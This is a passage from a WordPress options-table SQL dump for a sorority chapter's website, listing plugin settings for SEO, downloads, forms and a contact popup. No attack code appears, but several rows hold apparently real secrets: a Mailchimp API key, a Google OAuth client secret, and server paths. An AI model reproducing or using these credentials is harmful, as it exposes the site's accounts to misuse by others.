}','yes'),(8386,'widget_login_wid','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(102880,'login_afo_forgot_pass_link','661','yes'),(8394,'logout_redirect_page','6','yes'),(8395,'login_afo_rem','Yes','yes'),(9746,'mc_api_key','f50270e0b5703f32d39122017940d980-us11','yes'),(17679,'jpsq_sync-1484539607.864648-963112-1','a:5:{i:0;s:14:\"deleted_plugin\";i:1;a:2:{i:0;s:19:\"jetpack/jetpack.php\";i:1;b:1;}i:2;i:1;i:3;d:1484539607.8646281;i:4;b:0;}','no'),(17676,'jetpack_sync_settings_disable','0','yes'),(17713,'db_upgraded','','yes'),(17806,'TagPopup_title','','yes'),(17807,'TagPopup_FormTitle','Contact Us','yes'),(17808,'TagPopup_fromemail','no-reply-beauty-popup@tagwebs.in','yes'),(17809,'TagPopup_On_SendEmail','YES','yes'),(17810,'TagPopup_On_MyEmail','zen@zphiblgz.org','yes'),(17811,'TagPopup_On_Subject','ZEN Program Inquirty','yes'),(17812,'TagPopup_On_Captcha','YES','yes'),(17813,'TagPopup_ButtonLink','<img src=\'https://zphiblgz.org/wp-content/plugins/beauty-contact-popup-form/inc/img/contact-tag.png\' />','yes'),(17814,'TagPopup_homeurl','https://zphiblgz.org','yes'),(17815,'wpseo','a:45:{s:8:\"tracking\";b:0;s:22:\"license_server_version\";s:1:\"2\";s:15:\"ms_defaults_set\";b:0;s:40:\"ignore_search_engines_discouraged_notice\";b:0;s:19:\"indexing_first_time\";b:1;s:16:\"indexing_started\";b:0;s:15:\"indexing_reason\";s:26:\"permalink_settings_changed\";s:29:\"indexables_indexing_completed\";b:0;s:7:\"version\";s:4:\"17.2\";s:16:\"previous_version\";s:4:\"15.7\";s:20:\"disableadvanced_meta\";b:1;s:30:\"enable_headless_rest_endpoints\";b:0;s:17:\"ryte_indexability\";b:0;s:11:\"baiduverify\";s:0:\"\";s:12:\"googleverify\";s:0:\"\";s:8:\"msverify\";s:0:\"\";s:12:\"yandexverify\";s:0:\"\";s:9:\"site_type\";s:0:\"\";s:20:\"has_multiple_authors\";b:0;s:16:\"environment_type\";s:0:\"\";s:23:\"content_analysis_active\";b:1;s:23:\"keyword_analysis_active\";b:1;s:21:\"enable_admin_bar_menu\";b:1;s:26:\"enable_cornerstone_content\";b:1;s:18:\"enable_xml_sitemap\";b:1;s:24:\"enable_text_link_counter\";b:1;s:22:\"show_onboarding_notice\";b:1;s:18:\"first_activated_on\";i:1525531627;s:13:\"myyoast-oauth\";b:0;s:26:\"semrush_integration_active\";b:1;s:14:\"semrush_tokens\";a:0:{}s:20:\"semrush_country_code\";s:2:\"us\";s:19:\"permalink_structure\";s:12:\"/%postname%/\";s:8:\"home_url\";s:20:\"https://zphiblgz.org\";s:18:\"dynamic_permalinks\";b:0;s:17:\"category_base_url\";s:0:\"\";s:12:\"tag_base_url\";s:0:\"\";s:21:\"custom_taxonomy_slugs\";a:9:{s:16:\"cause_categories\";s:16:\"cause-categories\";s:17:\"sermon_categories\";s:17:\"sermon-categories\";s:16:\"event_categories\";s:16:\"event-categories\";s:17:\"videos_categories\";s:17:\"videos_categories\";s:19:\"eventbrite_category\";s:19:\"eventbrite_category\";s:14:\"eventbrite_tag\";s:14:\"eventbrite_tag\";s:5:\"teams\";s:5:\"teams\";s:28:\"portfolio_register_post_type\";s:20:\"portfolio-categories\";s:27:\"ts_pricing_table_categories\";s:27:\"ts_pricing_table-categories\";}s:29:\"enable_enhanced_slack_sharing\";b:1;s:25:\"zapier_integration_active\";b:0;s:19:\"zapier_subscription\";a:0:{}s:14:\"zapier_api_key\";s:0:\"\";s:23:\"enable_metabox_insights\";b:1;s:23:\"enable_link_suggestions\";b:1;s:26:\"algolia_integration_active\";b:0;}','yes'),(17817,'wpseo_titles','a:306:{s:17:\"forcerewritetitle\";b:0;s:9:\"separator\";s:7:\"sc-dash\";s:16:\"title-home-wpseo\";s:42:\"%%sitename%% %%page%% %%sep%% %%sitedesc%%\";s:18:\"title-author-wpseo\";s:41:\"%%name%%, Author at %%sitename%% %%page%%\";s:19:\"title-archive-wpseo\";s:38:\"%%date%% %%page%% %%sep%% %%sitename%%\";s:18:\"title-search-wpseo\";s:63:\"You searched for %%searchphrase%% %%page%% %%sep%% %%sitename%%\";s:15:\"title-404-wpseo\";s:35:\"Page not found %%sep%% %%sitename%%\";s:25:\"social-title-author-wpseo\";s:8:\"%%name%%\";s:26:\"social-title-archive-wpseo\";s:8:\"%%date%%\";s:31:\"social-description-author-wpseo\";s:0:\"\";s:32:\"social-description-archive-wpseo\";s:0:\"\";s:29:\"social-image-url-author-wpseo\";s:0:\"\";s:30:\"social-image-url-archive-wpseo\";s:0:\"\";s:28:\"social-image-id-author-wpseo\";i:0;s:29:\"social-image-id-archive-wpseo\";i:0;s:19:\"metadesc-home-wpseo\";s:0:\"\";s:21:\"metadesc-author-wpseo\";s:0:\"\";s:22:\"metadesc-archive-wpseo\";s:0:\"\";s:9:\"rssbefore\";s:0:\"\";s:8:\"rssafter\";s:53:\"The post %%POSTLINK%% appeared first on %%BLOGLINK%%.\";s:20:\"noindex-author-wpseo\";b:0;s:28:\"noindex-author-noposts-wpseo\";b:1;s:21:\"noindex-archive-wpseo\";b:1;s:14:\"disable-author\";b:0;s:12:\"disable-date\";b:0;s:19:\"disable-post_format\";b:0;s:18:\"disable-attachment\";b:0;s:20:\"breadcrumbs-404crumb\";s:25:\"Error 404: Page not found\";s:29:\"breadcrumbs-display-blog-page\";b:1;s:20:\"breadcrumbs-boldlast\";b:0;s:25:\"breadcrumbs-archiveprefix\";s:12:\"Archives for\";s:18:\"breadcrumbs-enable\";b:0;s:16:\"breadcrumbs-home\";s:4:\"Home\";s:18:\"breadcrumbs-prefix\";s:0:\"\";s:24:\"breadcrumbs-searchprefix\";s:16:\"You searched for\";s:15:\"breadcrumbs-sep\";s:7:\"&raquo;\";s:12:\"website_name\";s:0:\"\";s:11:\"person_name\";s:0:\"\";s:11:\"person_logo\";s:0:\"\";s:22:\"alternate_website_name\";s:0:\"\";s:12:\"company_logo\";s:67:\"https://zphiblgz.org/wp-content/uploads/2018/01/2017ChapterLOGO.png\";s:12:\"company_name\";s:54:\"Zeta Phi Beta Sorority, Inc. Lambda Gamma Zeta Chapter\";s:17:\"company_or_person\";s:7:\"company\";s:25:\"company_or_person_user_id\";b:0;s:17:\"stripcategorybase\";b:0;s:26:\"open_graph_frontpage_title\";s:12:\"%%sitename%%\";s:25:\"open_graph_frontpage_desc\";s:0:\"\";s:26:\"open_graph_frontpage_image\";s:0:\"\";s:10:\"title-post\";s:39:\"%%title%% %%page%% %%sep%% %%sitename%%\";s:13:\"metadesc-post\";s:0:\"\";s:12:\"noindex-post\";b:0;s:23:\"display-metabox-pt-post\";b:1;s:23:\"post_types-post-maintax\";i:0;s:21:\"schema-page-type-post\";s:7:\"WebPage\";s:24:\"schema-article-type-post\";s:7:\"Article\";s:17:\"social-title-post\";s:9:\"%%title%%\";s:23:\"social-description-post\";s:0:\"\";s:21:\"social-image-url-post\";s:0:\"\";s:20:\"social-image-id-post\";i:0;s:10:\"title-page\";s:39:\"%%title%% %%page%% %%sep%% %%sitename%%\";s:13:\"metadesc-page\";s:0:\"\";s:12:\"noindex-page\";b:0;s:23:\"display-metabox-pt-page\";b:1;s:23:\"post_types-page-maintax\";i:0;s:21:\"schema-page-type-page\";s:7:\"WebPage\";s:24:\"schema-article-type-page\";s:4:\"None\";s:17:\"social-title-page\";s:9:\"%%title%%\";s:23:\"social-description-page\";s:0:\"\";s:21:\"social-image-url-page\";s:0:\"\";s:20:\"social-image-id-page\";i:0;s:16:\"title-attachment\";s:39:\"%%title%% %%page%% %%sep%% %%sitename%%\";s:19:\"metadesc-attachment\";s:0:\"\";s:18:\"noindex-attachment\";b:0;s:29:\"display-metabox-pt-attachment\";b:1;s:29:\"post_types-attachment-maintax\";i:0;s:27:\"schema-page-type-attachment\";s:7:\"WebPage\";s:30:\"schema-article-type-attachment\";s:4:\"None\";s:23:\"title-eventbrite_events\";s:39:\"%%title%% %%page%% %%sep%% %%sitename%%\";s:26:\"metadesc-eventbrite_events\";s:0:\"\";s:25:\"noindex-eventbrite_events\";b:0;s:36:\"display-metabox-pt-eventbrite_events\";b:1;s:36:\"post_types-eventbrite_events-maintax\";i:0;s:34:\"schema-page-type-eventbrite_events\";s:7:\"WebPage\";s:37:\"schema-article-type-eventbrite_events\";s:4:\"None\";s:30:\"social-title-eventbrite_events\";s:9:\"%%title%%\";s:36:\"social-description-eventbrite_events\";s:0:\"\";s:34:\"social-image-url-eventbrite_events\";s:0:\"\";s:33:\"social-image-id-eventbrite_events\";i:0;s:33:\"title-ptarchive-eventbrite_events\";s:51:\"%%pt_plural%% Archive %%page%% %%sep%% %%sitename%%\";s:36:\"metadesc-ptarchive-eventbrite_events\";s:0:\"\";s:35:\"bctitle-ptarchive-eventbrite_events\";s:0:\"\";s:35:\"noindex-ptarchive-eventbrite_events\";b:0;s:40:\"social-title-ptarchive-eventbrite_events\";s:21:\"%%pt_plural%% Archive\";s:46:\"social-description-ptarchive-eventbrite_events\";s:0:\"\";s:44:\"social-image-url-ptarchive-eventbrite_events\";s:0:\"\";s:43:\"social-image-id-ptarchive-eventbrite_events\";i:0;s:20:\"title-mailmunch_page\";s:39:\"%%title%% %%page%% %%sep%% %%sitename%%\";s:23:\"metadesc-mailmunch_page\";s:0:\"\";s:22:\"noindex-mailmunch_page\";b:0;s:33:\"display-metabox-pt-mailmunch_page\";b:1;s:33:\"post_types-mailmunch_page-maintax\";i:0;s:31:\"schema-page-type-mailmunch_page\";s:7:\"WebPage\";s:34:\"schema-article-type-mailmunch_page\";s:4:\"None\";s:27:\"social-title-mailmunch_page\";s:9:\"%%title%%\";s:33:\"social-description-mailmunch_page\";s:0:\"\";s:31:\"social-image-url-mailmunch_page\";s:0:\"\";s:30:\"social-image-id-mailmunch_page\";i:0;s:11:\"title-cause\";s:39:\"%%title%% %%page%% %%sep%% %%sitename%%\";s:14:\"metadesc-cause\";s:0:\"\";s:13:\"noindex-cause\";b:0;s:24:\"display-metabox-pt-cause\";b:1;s:24:\"post_types-cause-maintax\";i:0;s:22:\"schema-page-type-cause\";s:7:\"WebPage\";s:25:\"schema-article-type-cause\";s:4:\"None\";s:18:\"social-title-cause\";s:9:\"%%title%%\";s:24:\"social-description-cause\";s:0:\"\";s:22:\"social-image-url-cause\";s:0:\"\";s:21:\"social-image-id-cause\";i:0;s:12:\"title-sermon\";s:39:\"%%title%% %%page%% %%sep%% %%sitename%%\";s:15:\"metadesc-sermon\";s:0:\"\";s:14:\"noindex-sermon\";b:0;s:25:\"display-metabox-pt-sermon\";b:1;s:25:\"post_types-sermon-maintax\";i:0;s:23:\"schema-page-type-sermon\";s:7:\"WebPage\";s:26:\"schema-article-type-sermon\";s:4:\"None\";s:19:\"social-title-sermon\";s:9:\"%%title%%\";s:25:\"social-description-sermon\";s:0:\"\";s:23:\"social-image-url-sermon\";s:0:\"\";s:22:\"social-image-id-sermon\";i:0;s:11:\"title-event\";s:39:\"%%title%% %%page%% %%sep%% %%sitename%%\";s:14:\"metadesc-event\";s:0:\"\";s:13:\"noindex-event\";b:0;s:24:\"display-metabox-pt-event\";b:1;s:24:\"post_types-event-maintax\";i:0;s:22:\"schema-page-type-event\";s:7:\"WebPage\";s:25:\"schema-article-type-event\";s:4:\"None\";s:18:\"social-title-event\";s:9:\"%%title%%\";s:24:\"social-description-event\";s:0:\"\";s:22:\"social-image-url-event\";s:0:\"\";s:21:\"social-image-id-event\";i:0;s:15:\"title-ts_slider\";s:39:\"%%title%% %%page%% %%sep%% %%sitename%%\";s:18:\"metadesc-ts_slider\";s:0:\"\";s:17:\"noindex-ts_slider\";b:0;s:28:\"display-metabox-pt-ts_slider\";b:1;s:28:\"post_types-ts_slider-maintax\";i:0;s:26:\"schema-page-type-ts_slider\";s:7:\"WebPage\";s:29:\"schema-article-type-ts_slider\";s:4:\"None\";s:22:\"social-title-ts_slider\";s:9:\"%%title%%\";s:28:\"social-description-ts_slider\";s:0:\"\";s:26:\"social-image-url-ts_slider\";s:0:\"\";s:25:\"social-image-id-ts_slider\";i:0;s:11:\"title-video\";s:39:\"%%title%% %%page%% %%sep%% %%sitename%%\";s:14:\"metadesc-video\";s:0:\"\";s:13:\"noindex-video\";b:0;s:24:\"display-metabox-pt-video\";b:1;s:24:\"post_types-video-maintax\";i:0;s:22:\"schema-page-type-video\";s:7:\"WebPage\";s:25:\"schema-article-type-video\";s:4:\"None\";s:18:\"social-title-video\";s:9:\"%%title%%\";s:24:\"social-description-video\";s:0:\"\";s:22:\"social-image-url-video\";s:0:\"\";s:21:\"social-image-id-video\";i:0;s:14:\"title-ts_teams\";s:39:\"%%title%% %%page%% %%sep%% %%sitename%%\";s:17:\"metadesc-ts_teams\";s:0:\"\";s:16:\"noindex-ts_teams\";b:0;s:27:\"display-metabox-pt-ts_teams\";b:1;s:27:\"post_types-ts_teams-maintax\";i:0;s:25:\"schema-page-type-ts_teams\";s:7:\"WebPage\";s:28:\"schema-article-type-ts_teams\";s:4:\"None\";s:21:\"social-title-ts_teams\";s:9:\"%%title%%\";s:27:\"social-description-ts_teams\";s:0:\"\";s:25:\"social-image-url-ts_teams\";s:0:\"\";s:24:\"social-image-id-ts_teams\";i:0;s:15:\"title-portfolio\";s:39:\"%%title%% %%page%% %%sep%% %%sitename%%\";s:18:\"metadesc-portfolio\";s:0:\"\";s:17:\"noindex-portfolio\";b:0;s:28:\"display-metabox-pt-portfolio\";b:1;s:28:\"post_types-portfolio-maintax\";i:0;s:26:\"schema-page-type-portfolio\";s:7:\"WebPage\";s:29:\"schema-article-type-portfolio\";s:4:\"None\";s:22:\"social-title-portfolio\";s:9:\"%%title%%\";s:28:\"social-description-portfolio\";s:0:\"\";s:26:\"social-image-url-portfolio\";s:0:\"\";s:25:\"social-image-id-portfolio\";i:0;s:22:\"title-ts_pricing_table\";s:39:\"%%title%% %%page%% %%sep%% %%sitename%%\";s:25:\"metadesc-ts_pricing_table\";s:0:\"\";s:24:\"noindex-ts_pricing_table\";b:0;s:35:\"display-metabox-pt-ts_pricing_table\";b:1;s:35:\"post_types-ts_pricing_table-maintax\";i:0;s:33:\"schema-page-type-ts_pricing_table\";s:7:\"WebPage\";s:36:\"schema-article-type-ts_pricing_table\";s:4:\"None\";s:29:\"social-title-ts_pricing_table\";s:9:\"%%title%%\";s:35:\"social-description-ts_pricing_table\";s:0:\"\";s:33:\"social-image-url-ts_pricing_table\";s:0:\"\";s:32:\"social-image-id-ts_pricing_table\";i:0;s:18:\"title-tax-category\";s:53:\"%%term_title%% Archives %%page%% %%sep%% %%sitename%%\";s:21:\"metadesc-tax-category\";s:0:\"\";s:28:\"display-metabox-tax-category\";b:1;s:20:\"noindex-tax-category\";b:0;s:25:\"social-title-tax-category\";s:23:\"%%term_title%% Archives\";s:31:\"social-description-tax-category\";s:0:\"\";s:29:\"social-image-url-tax-category\";s:0:\"\";s:28:\"social-image-id-tax-category\";i:0;s:18:\"title-tax-post_tag\";s:53:\"%%term_title%% Archives %%page%% %%sep%% %%sitename%%\";s:21:\"metadesc-tax-post_tag\";s:0:\"\";s:28:\"display-metabox-tax-post_tag\";b:1;s:20:\"noindex-tax-post_tag\";b:0;s:25:\"social-title-tax-post_tag\";s:23:\"%%term_title%% Archives\";s:31:\"social-description-tax-post_tag\";s:0:\"\";s:29:\"social-image-url-tax-post_tag\";s:0:\"\";s:28:\"social-image-id-tax-post_tag\";i:0;s:21:\"title-tax-post_format\";s:53:\"%%term_title%% Archives %%page%% %%sep%% %%sitename%%\";s:24:\"metadesc-tax-post_format\";s:0:\"\";s:31:\"display-metabox-tax-post_format\";b:1;s:23:\"noindex-tax-post_format\";b:1;s:28:\"social-title-tax-post_format\";s:23:\"%%term_title%% Archives\";s:34:\"social-description-tax-post_format\";s:0:\"\";s:32:\"social-image-url-tax-post_format\";s:0:\"\";s:31:\"social-image-id-tax-post_format\";i:0;s:26:\"title-tax-cause_categories\";s:53:\"%%term_title%% Archives %%page%% %%sep%% %%sitename%%\";s:29:\"metadesc-tax-cause_categories\";s:0:\"\";s:36:\"display-metabox-tax-cause_categories\";b:1;s:28:\"noindex-tax-cause_categories\";b:0;s:33:\"social-title-tax-cause_categories\";s:23:\"%%term_title%% Archives\";s:39:\"social-description-tax-cause_categories\";s:0:\"\";s:37:\"social-image-url-tax-cause_categories\";s:0:\"\";s:36:\"social-image-id-tax-cause_categories\";i:0;s:34:\"taxonomy-cause_categories-ptparent\";i:0;s:27:\"title-tax-sermon_categories\";s:53:\"%%term_title%% Archives %%page%% %%sep%% %%sitename%%\";s:30:\"metadesc-tax-sermon_categories\";s:0:\"\";s:37:\"display-metabox-tax-sermon_categories\";b:1;s:29:\"noindex-tax-sermon_categories\";b:0;s:34:\"social-title-tax-sermon_categories\";s:23:\"%%term_title%% Archives\";s:40:\"social-description-tax-sermon_categories\";s:0:\"\";s:38:\"social-image-url-tax-sermon_categories\";s:0:\"\";s:37:\"social-image-id-tax-sermon_categories\";i:0;s:35:\"taxonomy-sermon_categories-ptparent\";i:0;s:26:\"title-tax-event_categories\";s:53:\"%%term_title%% Archives %%page%% %%sep%% %%sitename%%\";s:29:\"metadesc-tax-event_categories\";s:0:\"\";s:36:\"display-metabox-tax-event_categories\";b:1;s:28:\"noindex-tax-event_categories\";b:0;s:33:\"social-title-tax-event_categories\";s:23:\"%%term_title%% Archives\";s:39:\"social-description-tax-event_categories\";s:0:\"\";s:37:\"social-image-url-tax-event_categories\";s:0:\"\";s:36:\"social-image-id-tax-event_categories\";i:0;s:34:\"taxonomy-event_categories-ptparent\";i:0;s:27:\"title-tax-videos_categories\";s:53:\"%%term_title%% Archives %%page%% %%sep%% %%sitename%%\";s:30:\"metadesc-tax-videos_categories\";s:0:\"\";s:37:\"display-metabox-tax-videos_categories\";b:1;s:29:\"noindex-tax-videos_categories\";b:0;s:34:\"social-title-tax-videos_categories\";s:23:\"%%term_title%% Archives\";s:40:\"social-description-tax-videos_categories\";s:0:\"\";s:38:\"social-image-url-tax-videos_categories\";s:0:\"\";s:37:\"social-image-id-tax-videos_categories\";i:0;s:35:\"taxonomy-videos_categories-ptparent\";i:0;s:29:\"title-tax-eventbrite_category\";s:53:\"%%term_title%% Archives %%page%% %%sep%% %%sitename%%\";s:32:\"metadesc-tax-eventbrite_category\";s:0:\"\";s:39:\"display-metabox-tax-eventbrite_category\";b:1;s:31:\"noindex-tax-eventbrite_category\";b:0;s:36:\"social-title-tax-eventbrite_category\";s:23:\"%%term_title%% Archives\";s:42:\"social-description-tax-eventbrite_category\";s:0:\"\";s:40:\"social-image-url-tax-eventbrite_category\";s:0:\"\";s:39:\"social-image-id-tax-eventbrite_category\";i:0;s:37:\"taxonomy-eventbrite_category-ptparent\";i:0;s:24:\"title-tax-eventbrite_tag\";s:53:\"%%term_title%% Archives %%page%% %%sep%% %%sitename%%\";s:27:\"metadesc-tax-eventbrite_tag\";s:0:\"\";s:34:\"display-metabox-tax-eventbrite_tag\";b:1;s:26:\"noindex-tax-eventbrite_tag\";b:0;s:31:\"social-title-tax-eventbrite_tag\";s:23:\"%%term_title%% Archives\";s:37:\"social-description-tax-eventbrite_tag\";s:0:\"\";s:35:\"social-image-url-tax-eventbrite_tag\";s:0:\"\";s:34:\"social-image-id-tax-eventbrite_tag\";i:0;s:32:\"taxonomy-eventbrite_tag-ptparent\";i:0;s:15:\"title-tax-teams\";s:53:\"%%term_title%% Archives %%page%% %%sep%% %%sitename%%\";s:18:\"metadesc-tax-teams\";s:0:\"\";s:25:\"display-metabox-tax-teams\";b:1;s:17:\"noindex-tax-teams\";b:0;s:22:\"social-title-tax-teams\";s:23:\"%%term_title%% Archives\";s:28:\"social-description-tax-teams\";s:0:\"\";s:26:\"social-image-url-tax-teams\";s:0:\"\";s:25:\"social-image-id-tax-teams\";i:0;s:23:\"taxonomy-teams-ptparent\";i:0;s:38:\"title-tax-portfolio_register_post_type\";s:53:\"%%term_title%% Archives %%page%% %%sep%% %%sitename%%\";s:41:\"metadesc-tax-portfolio_register_post_type\";s:0:\"\";s:48:\"display-metabox-tax-portfolio_register_post_type\";b:1;s:40:\"noindex-tax-portfolio_register_post_type\";b:0;s:45:\"social-title-tax-portfolio_register_post_type\";s:23:\"%%term_title%% Archives\";s:51:\"social-description-tax-portfolio_register_post_type\";s:0:\"\";s:49:\"social-image-url-tax-portfolio_register_post_type\";s:0:\"\";s:48:\"social-image-id-tax-portfolio_register_post_type\";i:0;s:46:\"taxonomy-portfolio_register_post_type-ptparent\";i:0;s:37:\"title-tax-ts_pricing_table_categories\";s:53:\"%%term_title%% Archives %%page%% %%sep%% %%sitename%%\";s:40:\"metadesc-tax-ts_pricing_table_categories\";s:0:\"\";s:47:\"display-metabox-tax-ts_pricing_table_categories\";b:1;s:39:\"noindex-tax-ts_pricing_table_categories\";b:0;s:44:\"social-title-tax-ts_pricing_table_categories\";s:23:\"%%term_title%% Archives\";s:50:\"social-description-tax-ts_pricing_table_categories\";s:0:\"\";s:48:\"social-image-url-tax-ts_pricing_table_categories\";s:0:\"\";s:47:\"social-image-id-tax-ts_pricing_table_categories\";i:0;s:45:\"taxonomy-ts_pricing_table_categories-ptparent\";i:0;s:14:\"person_logo_id\";i:0;s:15:\"company_logo_id\";i:1264;s:17:\"company_logo_meta\";a:9:{s:5:\"width\";i:1614;s:6:\"height\";i:1614;s:3:\"url\";s:67:\"https://zphiblgz.org/wp-content/uploads/2018/01/2017ChapterLOGO.png\";s:4:\"path\";s:74:\"/home2/zphiblgz/public_html/wp-content/uploads/2018/01/2017ChapterLOGO.png\";s:4:\"size\";s:4:\"full\";s:2:\"id\";i:1264;s:3:\"alt\";s:0:\"\";s:6:\"pixels\";i:2604996;s:4:\"type\";s:9:\"image/png\";}s:16:\"person_logo_meta\";b:0;s:29:\"open_graph_frontpage_image_id\";i:0;s:22:\"noindex-subpages-wpseo\";b:0;}','yes'),(17818,'wpseo_social','a:18:{s:13:\"facebook_site\";s:0:\"\";s:13:\"instagram_url\";s:0:\"\";s:12:\"linkedin_url\";s:0:\"\";s:11:\"myspace_url\";s:0:\"\";s:16:\"og_default_image\";s:0:\"\";s:19:\"og_default_image_id\";s:0:\"\";s:18:\"og_frontpage_title\";s:0:\"\";s:17:\"og_frontpage_desc\";s:0:\"\";s:18:\"og_frontpage_image\";s:0:\"\";s:21:\"og_frontpage_image_id\";s:0:\"\";s:9:\"opengraph\";b:1;s:13:\"pinterest_url\";s:0:\"\";s:15:\"pinterestverify\";s:0:\"\";s:7:\"twitter\";b:1;s:12:\"twitter_site\";s:0:\"\";s:17:\"twitter_card_type\";s:7:\"summary\";s:11:\"youtube_url\";s:0:\"\";s:13:\"wikipedia_url\";s:0:\"\";}','yes'),(17822,'wpseo_flush_rewrite','1','yes'),(18508,'c2c_obfuscate_email','a:6:{s:17:\"encode_everything\";s:1:\"1\";s:10:\"at_replace\";s:0:\"\";s:11:\"dot_replace\";s:0:\"\";s:18:\"use_text_direction\";s:0:\"\";s:16:\"use_display_none\";s:1:\"1\";s:8:\"_version\";s:5:\"3.8.1\";}','yes'),(17940,'stla_licenses','','yes'),(17963,'gf_stla_select_form_id','10','yes'),(17964,'gf_stla_general_settings','a:1:{s:12:\"reset-styles\";i:-1;}','yes'),(17973,'gf_stla_form_id_4','a:1:{s:13:\"submit-button\";a:3:{s:12:\"button-align\";s:4:\"left\";s:12:\"button-color\";s:7:\"#2741a6\";s:10:\"font-color\";s:7:\"#ffffff\";}}','yes'),(18076,'gform_email_count','555','yes'),(43729,'__wpdm_53d2f6cdcdd8ac34d48e9ea987c274a0','1','yes'),(23537,'galogin','a:9:{s:11:\"ga_clientid\";s:72:\"143330843218-vfg3s8e4jqjj4biml9mjq7apd3vje93p.apps.googleusercontent.com\";s:15:\"ga_clientsecret\";s:24:\"aacaUHU28_lb8OkL33gw48oK\";s:24:\"ga_ms_usesubsitecallback\";b:0;s:20:\"ga_force_permissions\";b:0;s:13:\"ga_auto_login\";b:0;s:12:\"ga_poweredby\";b:1;s:13:\"ga_rememberme\";b:0;s:14:\"ga_domainadmin\";s:0:\"\";s:10:\"ga_version\";s:3:\"3.0\";}','no'),(25025,'gform_upload_page_slug','05be7163539e45c','yes'),(23931,'thermometer_options','a:12:{s:14:\"colour_picker1\";s:7:\"#2741a6\";s:14:\"colour_picker2\";s:7:\"#000000\";s:7:\"chkbox2\";i:1;s:14:\"colour_picker3\";s:7:\"#000000\";s:7:\"chkbox3\";i:1;s:14:\"colour_picker4\";s:7:\"#000000\";s:8:\"currency\";s:1:\"$\";s:9:\"thousands\";s:9:\", (comma)\";s:13:\"target_string\";s:3:\"500\";s:13:\"raised_string\";s:1:\"5\";s:7:\"chkbox1\";i:0;s:8:\"trailing\";i:0;}','yes'),(19617,'w3tc_nr_application_id','{\"d41d8cd98f00b204e9800998ecf8427e\":0}','yes'),(18736,'wpseo_taxonomy_meta','a:2:{s:12:\"wpdmcategory\";a:1:{i:61;a:2:{s:13:\"wpseo_linkdex\";s:2:\"15\";s:19:\"wpseo_content_score\";s:2:\"30\";}}s:5:\"teams\";a:1:{i:45;a:2:{s:13:\"wpseo_linkdex\";s:2:\"-2\";s:19:\"wpseo_content_score\";s:2:\"30\";}}}','yes'),(18546,'widget_wpdm_packageinfo_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(18547,'widget_wpdm_categories_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(18548,'widget_wpdm_topdls_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(18549,'widget_wpdm_newpacks_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(18550,'widget_wpdm_catpacks_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(18551,'widget_wpdm_affiliate_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(98752,'woocommerce_permalinks','a:5:{s:12:\"product_base\";s:7:\"product\";s:13:\"category_base\";s:16:\"product-category\";s:8:\"tag_base\";s:11:\"product-tag\";s:14:\"attribute_base\";s:0:\"\";s:22:\"use_verbose_page_rules\";b:0;}','yes'),(18561,'wpdm_latest_check','1534137664','yes'),(18737,'wpdmcategory_children','a:1:{i:62;a:1:{i:0;i:61;}}','yes'),(18568,'task','wdm_save_settings','yes'),(18570,'section','basic','yes'),(18571,'wpdm_permission_msg','Access Denied','yes'),(18572,'wpdm_login_msg','<a href=\\\'https://zphiblgz.org/login/\\\'>Please login to download</a>','yes'),(18573,'_wpdm_file_browser_root','/home4/zphiblgz/public_html/','yes'),(18574,'_wpdm_file_browser_access','a:2:{i:0;s:5:\"staff\";i:1;s:13:\"administrator\";}','yes'),(18575,'__wpdm_sanitize_filename','0','yes'),(18576,'__wpdm_download_speed','4096','yes'),(18577,'__wpdm_download_resume','1','yes'),(18578,'__wpdm_support_output_buffer','1','yes'),(18579,'__wpdm_open_in_browser','1','yes'),(18580,'_wpdm_recaptcha_site_key','','yes'),(18581,'_wpdm_recaptcha_secret_key','','yes'),(18582,'__wpdm_disable_scripts','a:1:{i:0;s:0:\"\";}','yes'),(18583,'__wpdm_login_url','549','yes'),(18584,'__wpdm_register_url','','yes'),(18585,'__wpdm_user_dashboard','657','yes'),(18614,'__wpdmcategory','a:4:{i:59;a:1:{s:6:\"access\";a:3:{i:0;s:10:\"subscriber\";i:1;s:5:\"staff\";i:2;s:13:\"administrator\";}}i:60;a:1:{s:6:\"access\";a:1:{i:0;s:10:\"subscriber\";}}i:61;a:1:{s:6:\"access\";a:2:{i:0;s:8:\"__wpdm__\";i:1;s:10:\"subscriber\";}}i:62;a:1:{s:6:\"access\";a:1:{i:0;s:10:\"subscriber\";}}}','yes'),(18713,'wpdm_latest','s:2701:\"a:77:{s:16:\"download-manager\";s:5:\"4.7.7\";s:21:\"download-after-submit\";s:3:\"1.2\";s:15:\"email-templates\";s:1:\"1\";s:20:\"multilevel-marketing\";s:1:\"1\";s:14:\"wpdm-accordion\";s:5:\"1.8.8\";s:27:\"wpdm-advanced-custom-fields\";s:5:\"1.7.4\";s:14:\"wpdm-amazon-s3\";s:5:\"2.7.0\";s:8:\"wpdm-api\";s:5:\"2.1.0\";s:17:\"wpdm-archive-page\";s:5:\"2.9.3\";s:12:\"wpdm-audiojs\";s:1:\"1\";s:14:\"wpdm-autoshare\";s:1:\"1\";s:18:\"wpdm-block-hotlink\";s:1:\"1\";s:12:\"wpdm-box-com\";s:5:\"1.2.0\";s:21:\"wpdm-buddypress-share\";s:1:\"1\";s:21:\"wpdm-button-templates\";s:5:\"1.2.1\";s:21:\"wpdm-campaign-monitor\";s:5:\"1.2.0\";s:11:\"wpdm-catman\";s:5:\"1.2.1\";s:21:\"wpdm-constant-contact\";s:5:\"1.2.0\";s:15:\"wpdm-convertkit\";s:5:\"1.1.0\";s:17:\"wpdm-csv-importer\";s:5:\"2.6.0\";s:24:\"wpdm-custom-access-level\";s:5:\"2.7.0\";s:18:\"wpdm-custom-fields\";s:1:\"1\";s:19:\"wpdm-daily-download\";s:1:\"1\";s:19:\"wpdm-default-values\";s:5:\"1.6.0\";s:20:\"wpdm-download-button\";s:5:\"2.6.0\";s:20:\"wpdm-download-period\";s:5:\"1.2.1\";s:12:\"wpdm-dropbox\";s:5:\"1.2.0\";s:17:\"wpdm-email-editor\";s:1:\"1\";s:23:\"wpdm-email-notification\";s:5:\"1.3.1\";s:24:\"wpdm-extended-shortcodes\";s:5:\"2.8.1\";s:19:\"wpdm-facebook-login\";s:1:\"1\";s:19:\"wpdm-facebook-share\";s:5:\"1.5.0\";s:14:\"wpdm-file-cart\";s:5:\"1.2.4\";s:17:\"wpdm-file-hosting\";s:5:\"1.3.2\";s:16:\